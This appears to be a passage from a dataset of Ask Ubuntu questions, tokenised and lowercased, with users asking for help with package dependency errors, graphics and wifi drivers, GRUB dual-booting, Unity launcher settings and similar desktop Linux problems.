unconfigured e : linux-generic : dependency problems - leaving unconfigured e : linux-headers-2.6.32-45-generic : subprocess installed post-installation script returned error exit status 2 e : linux-headers-generic : dependency problems - leaving unconfigured oh , and i 'm on ubuntu 10.04lts . @ wolfer : the command outputs the following : > dpkg -l | grep linux-header ii linux-headers-2.6.32-45 2.6.32-45.102 header files related to linux kernel version if linux-headers-2.6.32-45-generic 2.6.32-45.102 linux kernel headers for version 2.6.32 on x iu linux-headers-generic 2.6.32.45.52 generic linux kernel headers i 'm not a power user ( yet ? : ) ) this vm was given to me from work and i was simply trying to `` tidy up '' / personalise . no idea when this was created ( year ago ? maybe more ? ) . dpkg -l | grep linux-image reports the following : > dpkg -l | grep linux-image pi linux-image-2.6.32-21-generic 2.6.32-21.32 linux kernel image for version 2.6.32 on x86 if linux-image-2.6.32-41-generic 2.6.32-41.94 linux kernel image for version 2.6.32 on x86 if linux-image-2.6.32-42-generic 2.6.32-42.96 linux kernel image for version 2.6.32 on x86 if linux-image-2.6.32-43-generic 2.6.32-43.97 linux kernel image for version 2.6.32 on x86 if linux-image-2.6.32-45-generic 2.6.32-45.102 linux kernel image for version 2.6.32 on x86 iu linux-image-generic 2.6.32.45.52 generic linux kernel image @ wolfer : apt-get install linux-generic gives me : [ sudo ] password for ubuntu : reading package lists ... done building dependency tree reading state information ... done linux-generic is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 18 not upgraded . 8 not fully installed or removed . after this operation , 0b of additional disk space will be used . ... and then the same thing all over again , it starts with : setting up linux-image-2.6.32-41-generic ( 2.6.32-41.94 ) ... running depmod . update-initramfs : generating /boot/initrd.img-2.6.32-41-generic ... and on and on ...
248706	need symbols for libopenal1 package	we 've got some crashes in libopenal.so.1.13.0 and unfortunately this package was built without symbols . i 've tried downloading libopenal1-dbgsym ( appending -dbgsym works for most packages once the ddebs repositories are configured ) but there is no -dbgsym package available for libopenal1 . apparently the package was built in a way that does n't work well with pkg-create-dbgsym . who should i talk to about getting this corrected ? canonical ? the developers of libopenal1 ? we could try building libopenal1 from source and distributing our version with symbols but that does n't seem like an ideal solution .
248709	will ubuntu one delete or restore files in the cloud after formatting my pc ?	one of pcs the windows is having typically windows issues and needs a reformat . i have my documents , pictures , music files etc syncing across ubuntu one to access on smartphone and my ubuntu dedicated pc . when i have reformatted pc , and install ubuntu one . what will happen ? will it sync my files to the pc , or will it delete the files and synchronize that there is nothing in the documents , music and picture folders .
248714	unity greeter not showing selector	i have installed gnome3.7 from gnome3 ppa and i have removed evolution using sudo apt-get remove evolution* and accidentally it removed gnome , gnome-shell and bunch of other things and now when i restart and log in it says failed to load sessioon `` gnome '' and unity greeter is not showing desktop environment selector ? i have cinnamon , unity , installed ? i went in to recovery mode edited lightdm conf file and set session to ubuntu but still it is logging into gnome instead of unity how i can fix this
248729	how can i mount partitons in recovery mode	i am unable to login to my account and i want to back up my data from documents folder so i need to know how to mount other partitions from recovery mode . how can i do this ? mv /home/username/documents /to_my_other_partitons
248732	why does libva return an error while trying to init intel gm965 driver ?	ubuntu 12.04 amd64 , intel 965gm chipset . here is the result of vainfo command : libva : va-api version 0.32.0 libva : va_getdrivername ( ) returns 0 libva : trying to open /usr/lib/x86_64-linux-gnu/dri/i965_drv_video.so libva error : /usr/lib/x86_64-linux-gnu/dri/i965_drv_video.so init failed libva : va_opendriver ( ) returns -1 vainitialize failed with error code -1 ( unknown libva error ) , exit . this file is actually exists , libva-intel-vaapi-driver is installed , even path to libva_driver is written to /etc/environment . i 've tried to install those drivers with or without stopping the lightdm service , with bleeding edge intel drivers or with standard canonical drivers , already . but have all the same result as at the beginning of the post . update : after some research i have found that there is a non-zero possibility that vaapi does n't support gm965 ( x3100 ) chipset . is it really so ?
248733	getting ubuntu 12.10 and windows 8 to work correctly dualboot . configuring grub	there may be several questions on similar lines . but this one is a bit different . my windows8 installation had stopped working earlier after installing ubuntu 12.10 , ( standard : can not find drivemap error ) , to fix this i installed boot repair from ubuntu , ran it , rebooted , and tried the various windows options from the grub menu , none of them worked , as a result , i got into bios and moved up the windows 8 option and booted directly into windows , which got windows to work , but now i cant access the grub loader as computer boots directly to windows 8 leaving my ubuntu inaccessible , any thoughts on how i could modify the grub , so that it contains the working windows 8 and ubuntu installations , would be appreciated . thanks !
248737	steam crash on playonlinux	i 'm trying to install steam using playonlinux/wine . there was nothing wrong with the installation , but whenever i try to login , steam crashes . after enabling the debugging mode , i got the log below . [ 01/28/13 20:45:09 ] - running wine-1.5.10 -- version wine-1.5.10 playonlinux logfile -- -- -- -- -- -- -- -- -- - date : 01/28/13 20:45:09 > playonlinux version 4.1.1 > uname -a linux ubuntu 3.5.0-17-generic # 28-ubuntu smp tue oct 9 19:31:23 utc 2012 x86_64 x86_64 x86_64 gnu/linux > lsb_release -a > wine -- version wine-1.5.10 > pol_wineversion 1.5.10 > wineprefix /home/mehmet/.playonlinux//wineprefix/steam > glxinfo \| grep rendering > glxinfo \| grep renderer > opengl libs ( direct rendering testing ) [ 01/28/13 20:46:04 ] - running wine-1.5.10 cmd /c echo % programfiles % c : \program files [ 01/28/13 20:46:08 ] - running wine-1.5.10 cmd /c echo % programfiles % c : \program files [ 01/28/13 20:46:17 ] - running wine-1.5.10 msiexec /i steaminstall.msi /q steam client service install completed.fixme : storage : create_storagefile storage share mode not implemented . err : mscoree : loadlibraryshim error reading registry key for installroot err : mscoree : loadlibraryshim error reading registry key for installroot err : mscoree : loadlibraryshim error reading registry key for installroot err : mscoree : loadlibraryshim error reading registry key for installroot fixme : msi : iterate_createshortcuts poorly handled shortcut format , advertised shortcut fixme : advapi : setnamedsecurityinfow l '' machine\\software\\valve\\steam '' 4 4 ( nil ) ( nil ) 0x133a10 ( nil ) fixme : advapi : setnamedsecurityinfow l '' c : \\program files\\steam '' 1 4 ( nil ) ( nil ) 0x133a10 ( nil ) fixme : hnetcfg : fw_app_put_processimagefilename 0x133b30 , l '' c : \\program files\\steam\\steam.exe '' fixme : hnetcfg : fw_app_put_name 0x133b30 , l '' steam '' fixme : hnetcfg : fw_apps_add 0x1334c8 , 0x133b30 fixme : service : queryserviceobjectsecurity 0x133b30 4 0x33f98c 512 0x33fbc0 - semi-stub fixme : service : setserviceobjectsecurity 0x133b30 4 0x33fb8c [ 01/28/13 20:46:26 ] - running wine-1.5.10 regedit /home/mehmet/.playonlinux//tmp/regkey.reg [ 01/28/13 20:46:26 ] - content of /home/mehmet/.playonlinux//tmp/regkey.reg -- -- -- -- -- - regedit4 [ hkey_current_user\software\wine\direct3d ] '' videomemorysize '' = '' 1024 '' -- -- -- -- -- - [ 01/28/13 20:46:26 ] - running wine-1.5.10 regedit /home/mehmet/.playonlinux//tmp/override-dll.reg [ 01/28/13 20:46:26 ] - content of /home/mehmet/.playonlinux//tmp/override-dll.reg -- -- -- -- -- - regedit4 [ hkey_current_user\software\wine\dlloverrides ] '' *dwrite '' = '' '' -- -- -- -- -- - [ 01/28/13 20:46:33 ] - running wine-1.5.10 steam.exe [ 01/28/13 20:46:45 ] - running wine-1.5.10 steam.exe [ 01/28/13 20:47:23 ] - running wine-1.5.10 steam.exe [ 0128/205207 : error : network_change_notifier_win.cc ( 111 ) ] wsalookupservicebegin failed with : 8 x error of failed request : badrequest ( invalid request code or no such operation ) major opcode of failed request : 154 ( glx ) minor opcode of failed request : 19 ( x_glxqueryserverstring ) serial number of failed request : 40321 current serial number in output stream : 40321 [ 01/28/13 21:05:47 ] - running wine-1.5.10 steam.exe fixme : advapi : eventregister { 47a9201e-73b0-42ce-9821-7e134361bc6f } , 0x3f0057f0 , 0x3f036b20 , 0x3f036b18 fixme : advapi : eventregister { 58a9201e-73b0-42ce-9821-7e134361bc70 } , 0x3f0057f0 , 0x3f036b58 , 0x3f036b50 fixme : advapi : eventregister { 3fa9201e-73b0-43fe-9821-7e145359bc6f } , 0x3f0057f0 , 0x3f036ae8 , 0x3f036ae0 fixme : advapi : eventregister { 1432afee-73b0-42ce-9821-7e134361b433 } , 0x3f0057f0 , 0x3f036b90 , 0x3f036b88 fixme : advapi : eventregister { 4372afee-73b0-42ce-9821-7e134361b519 } , 0x3f0057f0 , 0x3f036bc8 , 0x3f036bc0 fixme : process : setprocessshutdownparameters ( 00000100 , 00000000 ) : partial stub . fixme : iphlpapi : notifyaddrchange ( handle 0x172d6c4 , overlapped 0x1538058 ) : stub fixme : winsock : wsalookupservicebeginw ( 0x172d7c4 0x00000ff0 0x172d80c ) stub ! [ 0128/210549 : error : network_change_notifier_win.cc ( 111 ) ] wsalookupservicebegin failed with : 8 fixme : advapi : eventregister { 47a9201e-73b0-42ce-9821-7e134361bc6f } , 0x3f0057f0 , 0x3f036b20 , 0x3f036b18 fixme : advapi : eventregister { 58a9201e-73b0-42ce-9821-7e134361bc70 } , 0x3f0057f0 , 0x3f036b58 , 0x3f036b50 fixme : advapi : eventregister { 3fa9201e-73b0-43fe-9821-7e145359bc6f } , 0x3f0057f0 , 0x3f036ae8 , 0x3f036ae0 fixme : advapi : eventregister { 1432afee-73b0-42ce-9821-7e134361b433 } , 0x3f0057f0 , 0x3f036b90 , 0x3f036b88 fixme : advapi : eventregister { 4372afee-73b0-42ce-9821-7e134361b519 } , 0x3f0057f0 , 0x3f036bc8 , 0x3f036bc0 fixme : heap : heapsetinformation ( nil ) 1 ( nil ) 0 fixme : dbghelp : elf_search_auxv ca n't find symbol in module err : ole : cogetclassobject class { 77f10cf0-3db5-4966-b520-b7c54fd35ed6 } not registered err : ole : cogetclassobject no class object { 77f10cf0-3db5-4966-b520-b7c54fd35ed6 } could be created for context 0x1 fixme : wbemprox : wbem_locator_connectserver unsupported flags fixme : wbemprox : client_security_setblanket 0xf17bf660 , 0x1fb2e8 , 10 , 0 , ( null ) , 3 , 3 , ( nil ) , 0x00000000 fixme : wbemprox : client_security_release 0xf17bf660 fixme : wbemprox : enum_class_object_next timeout not supported err : ole : cogetclassobject class { dff32fea-3331-48da-a272-ccfc238695be } not registered err : ole : cogetclassobject class { dff32fea-3331-48da-a272-ccfc238695be } not registered err : ole : create_server class { dff32fea-3331-48da-a272-ccfc238695be } not registered fixme : ole : cogetclassobject clsctx_remote_server not supported err : ole : cogetclassobject no class object { dff32fea-3331-48da-a272-ccfc238695be } could be created for context 0x17 fixme : winhttp : winhttpdetectautoproxyconfigurl discovery via dhcp not supported fixme : advapi : eventunregister deadbeef : stub fixme : advapi : eventunregister deadbeef : stub fixme : advapi : eventunregister deadbeef : stub fixme : advapi : eventunregister deadbeef : stub fixme : advapi : eventunregister deadbeef : stub fixme : ntdll : ntlockfile i/o completion on lock not implemented yet fixme : win : registerdevicenotificationa ( hwnd=0x200b2 , filter=0x32d3cc , flags=0x00000004 ) returns a fake device notification handle ! x error of failed request : badrequest ( invalid request code or no such operation ) major opcode of failed request : 154 ( glx ) minor opcode of failed request : 19 ( x_glxqueryserverstring ) serial number of failed request : 1017 current serial number in output stream : 1017 by the way i 'm kinda new to ubuntu . so , if you think i should give you more details please let me know . thanks in advance , have a lovely day ...
248739	c++ gtkmm-2.4 - how to calculate size of unity launcher/panel ?	i am using gtkmm-2.4 for my ubuntu apps and to determine the size of the window for the application i use get_desktop_geometry . this returns the dimensions of the display you ask for . my issue is that when i use these dimensions to size my window , the window is slightly too big because i did n't account for the unity launcher ( on the side ) and the unity panel ( across the top ) . has anyone encountered this issue ? does anyone have any ideas or suggestions ? thanks in advance !
248740	how can i check if my computer has aes-ni support ?	i 've heard that disk encryption works reasonably faster when cpu supports aes-ni . how can i check if my cpu supports it ? does the ubuntus default encryption ( dm-crypt ) use it by default or do i have to enable it ?
248741	problem installing skype on ubuntu 12.10 : error in sound packages	i tried to install skype on my ubuntu 12.10 via command line $ sudo apt-get install skype i received this error : the following packages have unmet dependencies : libasound2-plugins : i386 : depends : libasound2 : i386 ( > = 1.0.25 ) but it is not going to be installed skype-bin : i386 : depends : libasound2 : i386 ( > = 1.0.23 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . when i tried the suggestion , $ sudo apt-get -f install i get the following error : unpacking libasound2 : i386 ( from ... /libasound2_1.0.25-3ubuntu3_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/libasound2_1.0.25-3ubuntu3_i386.deb ( -- unpack ) : trying to overwrite shared '/usr/share/alsa/alsa.conf ' , which is different from other instances of package libasound2 : i386 no apport report written because maxreports is reached already dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/libasound2_1.0.25-3ubuntu3_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) configuration of my ubuntu is as follows : $ uname -a linux sumitb-pc 3.5.0-21-generic # 32-ubuntu smp tue dec 11 18:51:59 utc 2012 x86_64 x86_64 x86_64 gnu/linux please help me out here ! : )
248745	how do i repair my broken catalogue ?	i 've run sudo apt-get install -f from which i received the error : ( after typing 'y ' to give it permission to install libreoffice-common ) errors were encountered while processing : /var/cache/apt/archives/libreoffice-common_1 % 3a3.6.2~rc2-0ubuntu4_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i am running 12.10 . i also ran the commands : sudo apt-get clean sudo apt-get autoremove sudo apt-get autoclean then i tried sudo apt-get remove libreoffice-common libreoffice-core libreoffice-ogltrans and received the error : package 'libreoffice-common ' is not installed , so not removed you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : libreoffice-base-core : depends : libreoffice-core ( = 1:3.6.2~rc2-0ubuntu4 ) but it is not going to be installed libreoffice-calc : depends : libreoffice-core ( = 1:3.6.2~rc2-0ubuntu4 ) but it is not going to be installed libreoffice-draw : depends : libreoffice-core ( = 1:3.6.2~rc2-0ubuntu4 ) but it is not going to be installed libreoffice-emailmerge : depends : libreoffice-core but it is not going to be installed libreoffice-gnome : depends : libreoffice-core ( = 1:3.6.2~rc2-0ubuntu4 ) but it is not going to be installed libreoffice-gtk : depends : libreoffice-core ( = 1:3.6.2~rc2-0ubuntu4 ) but it is not going to be installed libreoffice-impress : depends : libreoffice-core ( = 1:3.6.2~rc2-0ubuntu4 ) but it is not going to be installed libreoffice-math : depends : libreoffice-core ( = 1:3.6.2~rc2-0ubuntu4 ) but it is not going to be installed libreoffice-pdfimport : depends : libreoffice-core but it is not going to be installed libreoffice-presentation-minimizer : depends : libreoffice-core but it is not going to be installed libreoffice-presenter-console : depends : libreoffice-core but it is not going to be installed libreoffice-writer : depends : libreoffice-core ( = 1:3.6.2~rc2-0ubuntu4 ) but it is not going to be installed mythes-en-us : depends : libreoffice-core but it is not going to be installed or openoffice.org-core ( > = 1.9 ) but it is not installable or language-support-writing-en but it is not installable python-uno : depends : libreoffice-core ( = 1:3.6.2~rc2-0ubuntu4 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) .
248747	unable to install ubuntu 12.10 on windows xp professional	the message that i get is : c ; \docu~1\user\locals~1\temp\wubi12.10rev273log by opening this text file , i read that some picture could not be loaded . what am i to do ? stay on windows ?
248748	unity without panels	today i rebooted my laptop after several days of activity ( meaning i do n't know which updates were installed , although i supposed i can look it up ) . however , now when i log into my account , i can only see the background . i do n't think the window manager has crashed , as i can open a terminal with window decorations with the right mouse-button . if i select cinnamon or gnome classic , everything boots up correctly . 3d rendering is also still active because of the output from glxinfo . i have reinstalled ubuntu-desktop , unity and the nvidia-driver my laptop requires , but to no avail . removing the configuration files also did n't help . is there any way i can reinstall unity and get it back to ubuntu 's default behavior ?
248750	is gtk+ supported on ubuntu for phones	i wondered if gtk ui library would be supported on ubuntu phone and tablet ? i know the sdk for mobile encourage qml/qt but will it be still possible to develop apps for phones , and especially tablets , with gtk .
248752	ubuntu boot logo low resolution	i 'm curious . after installing ubuntu , the boot screen is not shown full screen . it 's shown in sort of a black frame like the resolution is n't high enough . when i change it to my native monitor resolution 1920x1080 the letters and logo assume the new resolution but the logo still is n't full screen . when i check the resolutions available for grub2 with vbeinfo command my resolution is n't listed . but i noticed , when i boot up from the ubuntu installation usb the boot logo is shown in full 1920x1080 resolution , no black bars and all . it 's not a serious problem but it really annoys me . can anyone help or suggest why this is happening . p.s . i 'm using proprietary drivers from nvidia-current-updates .
248769	what is the difference between ubuntu , kubuntu , xubuntu and lubuntu restricted extras/addons ?	while i use lubuntu , for example , do i need ubuntu-restricted ? or those of xubuntu or kubuntu ? do they add some enhancement , like supplementary media codecs , to what i have in lubuntu-restricted ? apt-cache search -- names-only `` . *ubuntu-restricted- ( addons|extras ) '' kubuntu-restricted-addons - commonly used restricted packages for kubuntu kubuntu-restricted-extras - commonly used restricted packages for kubuntu lubuntu-restricted-addons - commonly used restricted packages for lubuntu lubuntu-restricted-extras - commonly used restricted packages for lubuntu ubuntu-restricted-addons - commonly used restricted packages for ubuntu ubuntu-restricted-extras - commonly used restricted packages for ubuntu xubuntu-restricted-addons - commonly used restricted packages for xubuntu xubuntu-restricted-extras - commonly used restricted packages for xubuntu
248771	gpt table error when trying to install ubuntu 12.10 64	i am trying to install ubuntu 12.10 64b on dual-boot with preinstalled w8 . i already burnt a bootable usb with ubuntu-12.10-desktop-amd64 and configured my bios ( efi , secure boot disabled ) to boot from there . i can boot from usb and test ubuntu from the pendrive but gparted shows the following error : backup gpt table not at the end of the disk . this might mean that another os believes disk is smaller . fix by removing the bakcup to the end ( and removing the old backup ) showing `` fix '' , `` cancel '' and `` ignore '' as options . i am unaware how to proceed in order to avoid messing things up with w8 . i also tried to install ubuntu through wubi which did not work either ( but that is another help topic ... )
248772	accomplishments script cpu usage	since i installed ubuntu accomplishments again in 12.10 i constantly have about 15 % cpu usage by the script /usr/share/accomplishments/scripts/ubuntu-desktop/multimedia/multimedia-added-music.py i can kill it but it comes back on reboot . does someone know a way to solve this problem ?
248773	keyboard shortcut reset every other reboot	i 'm all for using default shortcuts for basic task â you 'll avoid conflict and know the default keys when using another ubuntu computer . one exception is the minimize window keyboard shortcut : ctrl+alt+0 . this only works with numpad zero ( not wise for an os optimized for netbooks ) and not for me as i do n't have a numpad . whenever i set a custom shortcut either via keyboard settings or dconf they only last one reboot . the only answer i found involves completely resetting unity which i would very much like to avoid as i have a lot of custom settings â and i do n't even know if it works for 12.10 . does anyone have a solution for this ? thanks !
248776	amd proprietary drivers on ubuntu 12.10 only see desktop	hi i 've been stuck with this problem and i hope someone can help . i 've installed ubuntu 12.10 64bit on my system . asus amd 6850 intel celeron g530 8gb ram motherboard : ga-h61ma-d3v ( rev . 2.0 ) i installed ubuntu fine but when i install the proprietary drivers all i can see on reboot is the background . i tried following this guide but it did not work http : //www.youtube.com/watch ? v=iomescoyyng amd catalyst : sudo apt-get purge fglrx sudo apt-get install linux-headers-generic reboot and then install proprietary drivers via software sources . i 'm also getting errors regarding compiz and unity , with xubuntu the drivers work fine .
248777	will webapps be able to send push notifications eventually ?	is there some plan to make web apps act with push notifications ? it would be really great ! for now firefox or chromium must be opened in the web app site to make it work .
248778	is there any list of laptops/desktops that fully work with ubuntu ?	i bought a dell xps 15 ( l502x ) and i always have some problems with drivers and such . and every dell that i have tried i have problems with graphics card and such . so i just wan na know if there are any list online that i can look at so i know which laptop i can buy next time i buy a pc , because i really want ubuntu on it . i know some people who ca n't use ubuntu because it just does n't work with their laptops . for my next laptop i wan na be sure if it 's fully supported with ubuntu and unity ! so here 's my question : is there any list online that shows if it 's fully supported with ubuntu and just works out of the box ? or can we just make one list right here ?
248780	ubuntu showing only 256mb of vram when it should be 1gb	i 'm having serious problems with my ati mobility radeon hd 5650 ( 1024mb vram ) . i tried using the `` official '' proprietary ati drivers , they bug out the screen and the video card is not even recognized . i 'm currently running the default x.org drivers , which recognize it , but only use 256mb of it 's vram : 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati madison [ radeon hd 5000m series ] ( prog-if 00 [ vga controller ] ) subsystem : acer incorporated [ ali ] device 036d flags : bus master , fast devsel , latency 0 , irq 43 memory at a0000000 ( 64-bit , prefetchable ) [ size=256m ] memory at b4000000 ( 64-bit , non-prefetchable ) [ size=128k ] i/o ports at 3000 [ size=256 ] expansion rom at b4040000 [ disabled ] [ size=128k ] capabilities : [ 50 ] power management version 3 capabilities : [ 58 ] express legacy endpoint , msi 00 capabilities : [ a0 ] msi : enable+ count=1/1 maskable- 64bit+ capabilities : [ 100 ] vendor specific information : id=0001 rev=1 len=010 < ? > kernel driver in use : radeon kernel modules : radeon i really notice some lack of video performance due to this fact . is there any fix out there that can make ubuntu use the full potential of my card . please help ! ps : further info i 'm using the latest build of ubuntu 12.10 64bit
248781	wol missing in bios , will it work ?	from help.ubuntu.com/community/wakeonlan in order to use wol it must be supported and enabled as necessary in the bios , nic and other network hardware ( routers , switches etc ) . you may also need to configure some software if things do n't work out-of-the-box . does this mean that i must have wol enabled in all 3 items or just one of them ? my question is because the nic says : supports wake-on : pumbg wake-on : g which , means that wol is present and enabled . however , there is no option in the bios ( it 's a eeebox 1503 ) to enable wol . actually , it loads a simple uefi , not exactly the bios , so that is probably why i do n't see any advanced option . the router supports wakeonlan . so , the bios is the only item i ca n't enable it . will i need to find a way to enable it there , or having it enabled on the nic is enough ? edit it was not working because i was trying to power up when the machine is completely off and not wake up from sleep/suspend mode . i want to power up , but i 'm not sure if this is possible . the answer provided by psusi answers my question . using ethtool to enable wol is enough .
248787	terminal command script launcher	i am trying to create a desktop shortcut or script that will automate terminal command input for me to open a program . cd /downloads cd /groovenet-master cd /project cd /bin ./groovenet once opened , the terminal should also remain open for the program to work . thanks .
248789	how do i determine the uncompressed size of a zip file without decompressing it ?	i have a large zip file and a limited amount of disk space . can i determine how much space the expanded contents will take without decompressing the file ?
248794	how to enable overscan compensation in the i915 driver ?	does the i915 driver support `` overscan compensation '' ? if so , how can i enable it ? edit : or is there any other driver for intel 's hd4000 graphic that supports `` overscan compensation '' ?
248799	mouse configuration file	which file ( name & path ) store the settings made in this window ?
248811	how can i fix incorrect mp3 duration ?	i have a number of songs in my music library that display incorrect duration values , and so play only partially in clementine . in banshee and some other players they show different duration values and sometimes play the full song . is there a way to fix this without having to `` re-encode '' the song ?
248813	humble bundle closure game : controls problem	when i start the closure game the character keeps moving to the left as if i was pressing the left key on the keyboard . when i try to change the controls configurations the game closes . any advice ?
248817	how to i connect a raw serial terminal to a bluetooth connection ?	i 'm trying to connect to a totalstation that does n't offer bluetooth drivers . as i am doing this for purely diagnostic reasons , i 'd like to see the raw output from the established serial connection . what do i have to do to pipe all output from a bluetooth connection to a terminal ?
248821	play a sound file when connecting to the internet ?	is it possible to play a certain sound file whenever ubuntu connects to the internet ? the sound should play when ubuntu begings to try to connect after starting up the pc , after manually disconnecting/reconnecting with the network manager , when reconnecting after 24 hour disconnects , etc .
248823	screenkey in kubuntu 12.04 ?	i 'm trying to run screenkey in order to screencast a tutorial in which the attendants are to see my key strokes . however , it turns out that although screencast did n't require any additional dependencies on kubuntu , whenever i attempt to use the `` preferences '' ( dialog ? ) nothing gets shown and the application freezes . the icon for screenkey in the notification bar also does n't react anymore from that point on . would this be a bug or expected behavior on kubuntu ?
248825	need help getting wifi to work on 12.04	i 'm having trouble connecting to my home 's wifi network , i 've run the sudo lshw -c network command , and since i 'm on another computer i ca n't type it all out but here 's some info : *-network description : network controller product : bcm4312 802.11b/g lp-phy vendor : broadcom corporation if any info is needed , ask , and i 'll gladly provide it . i also noticed that under additional drivers in settings , there 's a broadcom sta wireless driver that i can activate however when i click activate i get an error that says that the installation has failed . and i 'm provided with a log file location to look at for details but i 'm unsure of where to look for that path . how can i get connected to my network ?
248826	set multiple values for startupwmclass ( to group under same launcher in unity )	this a specific example of a generic problem i have n't been able to find a solution for yet . i have a program ( android virtual device manager ) that launches 'sub-programs ' ( namely emulators or virtual devices ) from within itself ( also can be launched from else where ) . i want any instances of either of these programs to be grouped under the same unity icon . i have created a .desktop file to try and accomplish this but do n't exactly know how to go about it . the desktop file is as follows : # ! /usr/bin/env xdg-open [ desktop entry ] version=1.0 type=application terminal=false name=android virtual device icon=/home/ben/.icons/android.svg exec=/home/ben/usr/bin/android avd startupwmclass=android virtual device manager from what i understand , startupwmclass is what i need to set to achieve this correctly . i have obtained the two class names ( 'android virtual device manager ' and 'emulator64-arm ' ) using xprop wm_class on the repsective windows . both work individually ( the launcher icon is correctly attached to the program no matter what way it is launched ) , but i can not get it to work for both . i am assuming that i somehow need to set two values for startupwmclass but have not been able to do it correctly ( or know if it is a valid operation ) . i have tried , colon separated like environment variables , comma separated , quotes , etc and i can not find any hints in the official documentation . any suggestions ? edit : another , more pedantic , but probably more identifiable example is with matlab . i am running 2013a and the splash screen that initially shows and the program have completely different wm_class values . this means , when i click my launcher with startupwmclass=com-mathworks-util-postvminitben in it , the splash screen comes up with a different ( default unknown ) unity icon , while the rest comes up grouped under my launcher . by using xprop wmclass and clicking on first the splash screen , then repeating with an active matlab session i get the following terminal output : ben @ ben-optiplex-9010 : ~ $ xprop wm_class wm_class ( string ) = `` matlab '' , `` matlab '' ben @ ben-optiplex-9010 : ~ $ xprop wm_class wm_class ( string ) = `` sun-awt-x11-xframepeer '' , `` com-mathworks-util-postvminit '' if i could specify something along the lines of : startupwmclass=com-mathworks-util-postvminitben & & matlab that would work perfectly ( as both work separately ) but i have no idea of the syntax , if it even exists . i just know nothing i have tried has worked thus far . any help or a definitive answer either way would be great as i believe this is a pretty fundamental element of a well functioning desktop .
248828	how to disable 3 finger drag on macbook air trackpad . i 'm a novice with command line	so i read the other answer for this question but i really was hoping to get a more basic explanation that would make sense to an ubuntu novice . i am running 12.10 on a 2011 macbook air and love it generally but three finger drag activating whenever i try to re-size a window is driving me completely insane . there seems to be a way to disable it , how can i disable the multitouch gestures in ubuntu ? but i lost the last contributor 's advice at `` ... create a shell script '' and the other answers did n't seem to work . wrt my familiarity with the command line i understand generally how to add repositories and update installed packages . kind of . that 's about it . any help for a noob here would be greatly appreciated .
248829	after upgrading packages today , ca n't compile anything that includes < locale >	i just updated my packages today on ubuntu 12.04 amd64 , including libc-bin which provides /usr/bin/locale , and now any c/c++ program that has # include < locale > explodes hundreds of errors along the lines of /usr/bin/locale:11:1 : error : stray â\374â in program what can i do ? i 've tried installing an older version of libc-bin through a deb from http : //packages.ubuntu.com/precise/amd64/libc-bin/download but it does n't seem to have done anything to fix my errors .
248830	ubuntu 12.10 wireless trouble macbook pro	i recently installed ubuntu 12.10 on my macbook pro mid 2012 alongside mountain lion using refit boot . i am having trouble connecting to wireless network . when i click the internet icon at the top of the menu bar , no networks are shown and when i try to manually connect through edit connections , it doese n't work . i did not instal any drivers for anything , but the trackpad ( even the two finger scrolling works ) , brightness keys , volume keys and keyboard illumination led brightness works . so.. i am guessing it came with some drivers . here are my results of some things i typed into terminal nm-tool state : disconnected device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : tg3 state : unavailable default : no hw address : a8:20:66:2a:05:23 capabilities : carrier detect : yes wired properties carrier : off sudo lshw -c network pci ( sysfs ) *-network description : ethernet interface product : netxtreme bcm57765 gigabit ethernet pcie vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:01:00.0 logical name : eth0 version : 10 serial : a8:20:66:2a:05:23 capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi msix pciexpress bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=tg3 driverversion=3.123 firmware=57765-v1.37 latency=0 link=no multicast=yes port=twisted pair resources : irq:16 memory : a0400000-a040ffff memory : a0410000-a041ffff *-network description : network controller product : bcm4331 802.11a/b/g/n vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 version : 02 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=bcma-pci-bridge latency=0 resources : irq:17 memory : a0600000-a0603fff thank you , any help is great , i am only 14 and i just need a bit of help . also , if this does n't work , will an older version of ubuntu or a different linux work ?
248834	unreadable disk error macbook pro	i have a macbook pro and i burn the dvd and it is verified i insert the dvd and it says : `` the disk you inserted was not readable by this computer '' what am i doing wrong ?
248843	option to connect to wifi disappeared after upgrading	i installed lubuntu on to my presario v5000 today off my old 12.04 disk . i installed all the updates then upgraded to 12.10 i was hooked up to an ethernet cable to update it and before i saw firmware missing under the card so i did n't think much of it after the upgrade when it disapeared so i installed the broadcam driver for it and it still was n't there so i would like to know if anyone knows how i could fix my wireless card .
248844	can not install libglade2-ruby dependency for grism	hey guys i 'm trying to install grism . i 've followed installation steps from http : //www.grism.org/install.html , which are fairly simple , just need to install dependencies and than install the deb package . the problem is i can not install libglade2-ruby dependency ! ! ! any ideas ? i have ubuntu 12.10 on both pc and laptop - 64 and 32 bits respectively , tried on both . ideally i want it on my 32bit laptop . reading package lists ... done building dependency tree reading state information ... done package libglade2-ruby is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'libglade2-ruby ' has no installation candidate i have tried to install gnome2-ruby or gtk2-ruby and it still does n't work .
248846	excessive data received on idle	my computer sometimes downloads excessive amounts of data while on idle ( in the 10mib area ) , so far my only solution is to restart my computer.at first i thought it was a mistake but it is actually tying up my home network extra relevant info : - im using wine to run various games , some involve online content ( i.e wow , sc2 , d3 ) - my desktop doubles as a hotspot to 3 devices using hostapd and relevant dependancies , which were to my knowledge idle or disconnected at the time , but my script was still running -i 'm also using the steam beta on linux and do have games donwloaded/played through it can anyone recommend some tools or a solution that will help me find what is causing this ?
248851	how do i disable dual screen after connect hdmi cable ?	i plugged the hdmi connector and turned on the computer , but when the log in screen appears the laptop screen appears split in 2 , one top and one bottom . the external monitor connected via hdmi works fine . i just need to know how do i disable dual screen from laptop and back to normal .
